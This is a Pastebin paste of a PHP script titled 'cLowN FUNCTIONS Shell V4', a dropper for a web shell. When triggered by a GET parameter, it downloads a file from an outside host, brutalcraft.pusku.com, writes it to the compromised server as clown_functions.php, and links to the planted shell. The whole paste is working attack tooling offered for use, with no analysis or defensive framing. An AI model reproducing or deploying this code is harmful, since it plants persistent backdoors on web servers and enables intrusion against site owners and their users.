Advertisement
Guest User

cLowN FUNCTIONS Shell V4

a guest
Jun 28th, 2014
456
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.01 KB | None | 0 0
  1. <html>
  2. <body bgcolor="black">
  3. <title>
  4. Functions Shell - Denetim
  5. </title>
  6. <form action="" method="get">
  7. <center><input type="image" value="Denetle" src="http://hackerclown.org/depo/Root/giris.png" name="Giris" /></center>
  8. </form>
  9. <?
  10. $dizin = $_SERVER['PHP_SELF'];
  11. $functions_shell = 'http://'.$_SERVER['HTTP_HOST'].dirname($dizin).'/clown_functions.php';
  12. if($_GET["Giris"]=="Denetle")
  13. {
  14. # Shell
  15. $b37 = 'http://brutalcraft.pusku.com/clown_functions/clown_functions.txt';
  16. $sh = file_get_contents($b37);
  17. $open = fopen('clown_functions.php', 'w');
  18. fwrite($open,$sh);
  19. fclose($open);
  20. if($open) {
  21. echo "<font color='red' face='Trebuchet MS' size='+3'>"."<center>"."Shell Denetlendi!"."<br />Guncellemeler Yapildi!"."<br /><a href='$functions_shell'>KULLAN</a>"."</center>"."</font>";
  22. } else {
  23. echo "<font color='red' face='Trebuchet MS' size='+3'>"."<center>Error !</center>"."</font>";
  24. }
  25. }
  26. ?>
  27. <center><font color="GREEN" size="+2" face="Trebuchet MS">Coded By cLowN</font></center>
  28. </body>
  29. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement